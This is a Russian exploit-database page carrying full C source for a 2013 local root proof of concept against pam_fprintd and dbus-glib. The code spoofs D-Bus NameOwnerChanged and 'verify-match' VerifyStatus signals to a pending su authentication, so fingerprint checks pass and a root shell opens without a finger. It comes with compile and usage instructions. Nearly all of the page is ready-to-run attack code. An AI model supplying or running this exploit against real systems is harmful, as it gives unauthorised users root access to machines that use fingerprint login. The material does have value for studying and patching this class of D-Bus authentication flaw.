dbus-glib pam_fprintd - Local Root Exploit

Свойства

Дата публикации:
05.06.2014
Цель:
dbus-glib pam_fprintd
Тип воздействия:
Повышение привилегий

Код

/* darklena. fprintd/pam_fprintd local root PoC. However dbus-glib plays an important role.
*
* (C) 2013 Sebastian Krahmer, all rights reversed.
*
* pam_fprintd uses net.reactivated.Fprint service to trigger finger swiping and
* registers DBUS signal inside the PAM authentication function:
*
*       dbus_g_proxy_add_signal(dev, "VerifyStatus", G_TYPE_STRING, G_TYPE_BOOLEAN, NULL);
*       dbus_g_proxy_add_signal(dev, "VerifyFingerSelected", G_TYPE_STRING, NULL);
*       dbus_g_proxy_connect_signal(dev, "VerifyStatus", G_CALLBACK(verify_result),
*                                   data, NULL);
*
* Then, when the DBUS signal arrives, the signal argument is basically just checked
* to be the "verify-match" string; which however is expected to come from the legit
* net.reactivated.Fprint service. Since there is no message filter registered in either
* pam_fprintd, nor inside dbus-glib which it is using, such signals can be spoofed
* by anyone. In order to do so, we first need to spoof a NameOwnerChanged signal
* so the dbus_g_proxy_manager_filter() function inside dbus-glib will find our
* sender-name (which cannot be spoofed) inside its hash tables and match it to
* net.reactivated.Fprint.
*
* To test this PoC, start a service (su is fine) as user that is using pam_fprintd.
* On a second xterm, when you see 'Swipe your ... finger' message start this PoC
* and you will notice that a rootshell is spawned in the first xterm w/o giving your finger. :p
*
* Used various DBUS tutorials and example code, while writing this.
*
* $ cc darklena.c `pkg-config --cflags dbus-1` -ldbus-1 -Wall
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <dbus/dbus.h>


void die(const char *s)
{
  perror(s);
  exit(errno);
}


int main(int argc, char **argv)
{
  DBusError err;
  DBusConnection *conn = NULL;
  DBusMessage *vrfy_msg = NULL, *noc_msg = NULL, *nl_msg = NULL, *reply = NULL;
  dbus_uint32_t serial = 0;
  dbus_bool_t t = 1;
  int un = 0, i = 0, reply_to = -1;
  const char *vrfy_match = "verify-match", *cname = NULL,
             *name = "net.reactivated.Fprint", *prev_owner = NULL;
  char dest[32];

  /* override unique name of net.reactivated.Fprint */
  if (argc > 1)
    prev_owner = strdup(argv[1]);

  printf("\n[**] darklena, pam_fprintd PoC exploit 2013\n\n");

  printf("[*] Initializing DBUS ...\n");
  dbus_error_init(&err);
  conn = dbus_bus_get(DBUS_BUS_SYSTEM, &err);

  if (dbus_error_is_set(&err)) {
    fprintf(stderr, "Error: %s\n", err.message);
    die("dbus_error_is_set");
  }

  if ((cname = dbus_bus_get_unique_name(conn)) == NULL)
    die("dbus_bus_get_unique_name");

  un = atoi(strchr(cname, '.') + 1);

  printf("[+] Done. Found my unique name: %s (%d)\n", cname, un);

  if (!prev_owner) {
    printf("[*] Trying to find unique name of '%s' ...\n", name);
    nl_msg = dbus_message_new_method_call("org.freedesktop.DBus",
                                          "/org/freedesktop/DBus",
                                            "org.freedesktop.DBus",
                                          "GetNameOwner");

    if (!dbus_message_append_args(nl_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_INVALID))
      die("[-] dbus_message_append_args");

    reply = dbus_connection_send_with_reply_and_block(conn, nl_msg, reply_to, &err);
    dbus_message_unref(nl_msg);

    if (dbus_error_is_set(&err)) {
      fprintf (stderr, "[-] Error: %s\n", err.message);
      die("[-] dbus_connection_send_with_reply_and_block");
    }

    if (!dbus_message_get_args(reply, &err,
                               DBUS_TYPE_STRING, &prev_owner, DBUS_TYPE_INVALID)) {
      fprintf(stderr, "[-] Error: %s\n", err.message);
      die("[-] dbus_message_get_args");
    }

    dbus_message_unref(reply);
  }

  printf("[+] Found unique name of '%s' as '%s'\n", name, prev_owner);

  for (i = 1; i < 20; ++i) {
    /* spoof a NameOwnerChanged signal */
    noc_msg = dbus_message_new_signal("/org/freedesktop/DBus",
                                      "org.freedesktop.DBus",
                                      "NameOwnerChanged");

    /* spoof a VerifyStatus */
    vrfy_msg = dbus_message_new_signal("/net/reactivated/Fprint/Device/0",
                                             "net.reactivated.Fprint.Device",
                                             "VerifyStatus");

    if (!vrfy_msg || !noc_msg)
      die("[-] dbus_message_new_signal");

    if (!dbus_message_append_args(noc_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_STRING,
                                  &prev_owner, DBUS_TYPE_STRING, &cname, DBUS_TYPE_INVALID))
      die("[-] dbus_message_append_args1");

    if (!dbus_message_append_args(vrfy_msg, DBUS_TYPE_STRING, &vrfy_match,
                                  DBUS_TYPE_BOOLEAN, &t, DBUS_TYPE_INVALID))
      die("[-] dbus_message_append_args2");

    /* iterate over unique names short below under our own
     * to hit the previously started su
     */
    snprintf(dest, sizeof(dest), ":1.%d", un - i);
    printf("[*] Using new destination: %s\n", dest);

    if (!dbus_message_set_destination(vrfy_msg, dest))
      die("[-] dbus_message_set_destination");

    if (!dbus_message_set_destination(noc_msg, dest))
      die("[-] dbus_message_set_destination");

    if (!dbus_connection_send(conn, noc_msg, &serial))
      die("[-] dbus_connection_send");

    dbus_connection_flush(conn);
    usleep(1000);

    if (!dbus_connection_send(conn, vrfy_msg, &serial))
      die("[-] dbus_connection_send");

    dbus_connection_flush(conn);

    dbus_message_unref(vrfy_msg);
    dbus_message_unref(noc_msg);
  }

  printf("\n[**] Here comes the pain! (but no one's to too innocent to die)\n");
  return 0;
}

или введите имя

CAPTCHA